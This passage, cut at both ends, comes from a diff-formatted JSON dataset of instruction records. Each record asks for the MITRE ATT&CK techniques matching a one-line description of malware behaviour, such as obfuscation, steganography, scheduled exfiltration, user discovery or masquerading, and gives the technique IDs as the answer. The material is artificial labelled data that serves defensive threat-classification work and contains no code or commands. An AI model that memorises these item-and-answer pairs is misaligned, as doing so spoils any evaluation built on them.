a list of technique IDs with their names.", + "input": "BoomBox can encrypt data using AES prior to exfiltration.", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dtrack has used a dropper that embeds an encrypted payload as extra data.", + "output": "- T1027.009: Obfuscated Files or Information - Embedded Payloads\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Goopy's decrypter have been inflated with junk code in between legitimate API functions, and also included infinite loops to avoid analysis.", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"If the victim is using PowerShell 3.0 or later, POWERSOURCE writes its decoded payload to an Alternate Data Stream (ADS) named kernel32.dll that is saved in \"\"%PROGRAMDATA%\\Windows\\\"\".\"", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "MCMD can Base64 encode output strings prior to sending to C2.", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Maze has decrypted strings and other important information during the encryption process. Maze also calls certain functions dynamically to hinder analysis.", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Moses Staff has used obfuscated web shells in their operations.", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PowerStallion uses a XOR cipher to encrypt command output written to its OneDrive C2 server.", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ROKRAT can encrypt data prior to exfiltration by using an RSA public key.", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ShimRatReporter encrypted gathered information with a combination of shifting and XOR using a static key.", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SoreFang has the ability to encode and RC6 encrypt data sent to C2.", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Trojan.Karagany can base64 encode and AES-128-CBC encrypt data prior to transmission.", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Javali can use large obfuscated libraries to hinder detection and analysis.", + "output": "- T1027.001: Obfuscated Files or Information - Binary Padding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Patchwork apparently altered NDiskMonitor samples by adding four bytes of random letters in a likely attempt to change the file hashes.", + "output": "- T1027.005: Obfuscated Files or Information - Indicator Removal from Tools\n- T1027.001: Obfuscated Files or Information - Binary Padding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ZeroT has obfuscated DLLs and functions using dummy API calls inserted between real instructions.", + "output": "- T1027.001: Obfuscated Files or Information - Binary Padding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Bisonal has used the MPRESS packer and similar tools for obfuscation.", + "output": "- T1027.002: Obfuscated Files or Information - Software Packing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CostaBricks can implement a custom-built virtual machine mechanism to obfuscate its code.", + "output": "- T1027.002: Obfuscated Files or Information - Software Packing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Egregor's payloads are custom-packed, archived and encrypted to prevent analysis.", + "output": "- T1027.002: Obfuscated Files or Information - Software Packing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "QakBot can encrypt and pack malicious payloads.", + "output": "- T1027.002: Obfuscated Files or Information - Software Packing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BRONZE BUTLER has used steganography in multiple operations to conceal malicious payloads.", + "output": "- T1027.003: Obfuscated Files or Information - Steganography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Leviathan has used steganography to hide stolen data inside other files stored on Github.", + "output": "- T1027.003: Obfuscated Files or Information - Steganography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RDAT can also embed data within a BMP image prior to exfiltration.", + "output": "- T1027.003: Obfuscated Files or Information - Steganography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RegDuke can hide data in images, including use of the Least Significant Bit (LSB).", + "output": "- T1027.003: Obfuscated Files or Information - Steganography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Gamaredon Group has compiled the source code for a downloader directly on the infected system using the built-in \"\"Microsoft.CSharp.CSharpCodeProvider\"\" class.\"", + "output": "- T1027.004: Obfuscated Files or Information - Compile After Delivery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Deep Panda has updated and modified its malware, resulting in different hash values that evade detection.", + "output": "- T1027.005: Obfuscated Files or Information - Indicator Removal from Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "InvisiMole has undergone regular technical improvements in an attempt to evade detection.", + "output": "- T1027.005: Obfuscated Files or Information - Indicator Removal from Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SUNBURST source code used generic variable names and pre-obfuscated strings, and was likely sanitized of developer comments before being added to SUNSPOT.", + "output": "- T1027.005: Obfuscated Files or Information - Indicator Removal from Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT29 has embedded an ISO file within an HTML attachment that contained JavaScript code to initiate malware execution.", + "output": "- T1027.006: Obfuscated Files or Information - HTML Smuggling" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "EnvyScout contains JavaScript code that can extract an encoded blob from its HTML body and write it to disk.", + "output": "- T1027.006: Obfuscated Files or Information - HTML Smuggling" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Bazar can hash then resolve API calls at runtime.", + "output": "- T1027.007: Obfuscated Files or Information - Dynamic API Resolution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lazarus Group has used a custom hashing method to resolve APIs used in shellcode.", + "output": "- T1027.007: Obfuscated Files or Information - Dynamic API Resolution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Pteranodon can use a dynamic Windows hashing algorithm to map API components.", + "output": "- T1027.007: Obfuscated Files or Information - Dynamic API Resolution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "macOS.OSAMiner has used run-only Applescripts, a compiled and stripped version of AppleScript, to remove human readable indicators to evade detection.", + "output": "- T1027.008: Obfuscated Files or Information - Stripped Payloads" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "macOS.OSAMiner has embedded Stripped Payloads within another run-only Stripped Payloads.", + "output": "- T1027.009: Obfuscated Files or Information - Embedded Payloads" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ADVSTORESHELL collects, compresses, encrypts, and exfiltrates data to the C2 server every 10 minutes.", + "output": "- T1029: Scheduled Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cobalt Strike can set its Beacon payload to reach out to the C2 server on an arbitrary and random interval.", + "output": "- T1029: Scheduled Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LightNeuron can be configured to exfiltrate data during nighttime or working hours.", + "output": "- T1029: Scheduled Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "POWERSTATS can sleep for a given number of seconds.", + "output": "- T1029: Scheduled Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT39 used Remexi to collect usernames from the system.", + "output": "- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BloodHound can collect information on user sessions.", + "output": "- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Caterpillar WebShell can obtain a list of user accounts from a victim's machine.", + "output": "- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "DRATzarus can obtain a list of users from an infected machine.", + "output": "- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Night Dragon, threat actors used password cracking and pass-the-hash tools to discover usernames and passwords.", + "output": "- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FIN10 has used Meterpreter to enumerate users on remote systems.", + "output": "- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Linux Rabbit opens a socket on port 22 and if it receives a response it attempts to obtain the machine's hostname and Top-Level Domain.", + "output": "- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Mis-Type runs tests to determine the privilege level of the compromised user.", + "output": "- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "EnvyScout has used folder icons for malicious files to lure victims into opening them.", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LazyScripter has used several different security software icons to disguise executables.", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Mustang Panda has used an additional filename extension to hide the true file type.", + "output": "- T1036.007: Masquerading - Double File Extension\n- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NativeZone has, upon execution, displayed a message box that appears to be related to a Ukrainian electronic document management system.", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Nomadic Octopus attempted to make Octopus appear as a Telegram Messenger with a Russian interface.", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NotPetya drops PsExec with the filename dllhost.dat.", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "QuasarRAT has dropped binaries as files named 